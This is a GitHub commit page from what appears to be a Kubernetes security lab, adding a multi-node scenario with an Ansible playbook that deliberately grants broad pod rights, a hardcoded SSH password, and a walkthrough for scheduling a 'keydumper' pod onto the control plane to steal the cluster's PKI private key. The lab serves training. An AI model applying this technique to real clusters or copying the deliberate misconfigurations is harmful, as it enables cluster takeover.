Skip to content

Commit

Permalink
new scenario with taint override
Browse files Browse the repository at this point in the history
  • Loading branch information
raesene committed Dec 28, 2020
1 parent 233ee79 commit cbc1822
Show file tree
Hide file tree
Showing 6 changed files with 102 additions and 1 deletion.
2 changes: 1 addition & 1 deletion Scenario Setups/ssh-to-create-pod-easy.md
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@

This cluster has an exposed SSH service running on port 32001/TCP to a pod in the cluster with rights to manage pods in the default namespace. To test this run

- `ansible-playbook ssh-to-create-pods-easy.yml`
- `ansible-playbook ssh-to-create-pod-easy.yml`

Then get a note of the IP address of the Kubernetes cluster with

Expand Down
25 changes: 25 additions & 0 deletions Scenario Setups/ssh-to-create-pod-multi-node.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
## SSH to Create Pod - Easy

This cluster has an exposed SSH service running on port 32001/TCP to a pod in the cluster with rights to manage pods in the default namespace. To test this run

- `ansible-playbook ssh-to-create-pod-multi-node.yml`

Then get a note of the IP address of the worker node in the cluster by running

```
docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' sshcpmn-worker
```

Connect to your client container

```
docker exec -it client /bin/bash
```

and from there

```
ssh -p 32001 sshuser@[worker node ip]
```

The password for the sshuser account is `sshuser`
24 changes: 24 additions & 0 deletions Scenario Walkthroughs/ssh-to-create-pod-multi-node.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
## SSH to Create Pod - Easy

## Compromising the cluster

3. `kubectl get po -n kube-system` will fail (user doesn't have those rights)
4. `kubectl get po` will work and give you a list of pods in the default namespace
At this point there's several ways to achieve the goal, lets go with hostpath, however as we have a multi-node cluster, we need to make sure that our pod will land on the control plane node that has the key available.

5. There's two steps needed to modify the keydumper manifest to have this work. First, copy the `/key-dumper-pod.yml` file to `/home/sshuser/`, then add the following lines to the spec section of the manifest to allow it to schedule to a control plane node :-
```yaml
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
```
6. Then we need to specify the node to land on , get the nodes with `kubectl get nodes` then add the following line to the spec. section of the manifest.
```yaml
nodeName: sshcpmn-control-plane
```


5. Now we need to create a pod that dumps out the PKI private key `kubectl create -f keydumper.yml`
6. and the key should be in the logs `kubectl logs keydumper-pod`
7. profit!
3 changes: 3 additions & 0 deletions attacker_manifests/noderoot.yml
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,9 @@ metadata:
name: noderootpod
labels:
spec:
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
hostNetwork: true
hostPID: true
hostIPC: true
Expand Down
6 changes: 6 additions & 0 deletions kubeadm_configs/multi-node-cluster.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4

nodes:
- role: control-plane
- role: worker
43 changes: 43 additions & 0 deletions ssh-to-create-pods-multi-node.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,43 @@
#!/usr/bin/env ansible-playbook
---
- name: Start up a kind cluster
hosts: localhost
vars:
cluster_name: sshcpmn
# This needs to be the cluster name with -control-plane added
container_name: sshcpmn-control-plane
cluster_config: multi-node-cluster.yml
kubernetes_version: v1.18.2

tasks:
- import_tasks: ./ansible_tasks/setup_kind_custom_config.yaml


- name: Setup Cluster
hosts: sshcpmn-control-plane
connection: docker
vars:
ansible_python_interpreter: /usr/bin/python3

tasks:
- import_tasks: ./ansible_tasks/setup_kubeconfig.yml
- import_tasks: ./ansible_tasks/setup_ssh_pod.yml

- name: Copy Role Manifest
copy:
src: ./manifests/pod-manager.yml
dest: /root

- name: Apply Role Manifest
command: kubectl create -f /root/pod-manager.yml

- name: Give the default service account rights to manage pods
command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-manager --group=system:serviceaccounts

- name: Create a clusterrole for reading nodes
command: kubectl create clusterrole node-reader --verb=get,list --resource=nodes

- name: Give the default service account rights to get nodes
command: kubectl create clusterrolebinding serviceaccounts-read-nodes --clusterrole=node-reader --group=system:serviceaccounts

- import_tasks: ./ansible_tasks/print_cluster_ip.yml

0 comments on commit cbc1822

Please sign in to comment.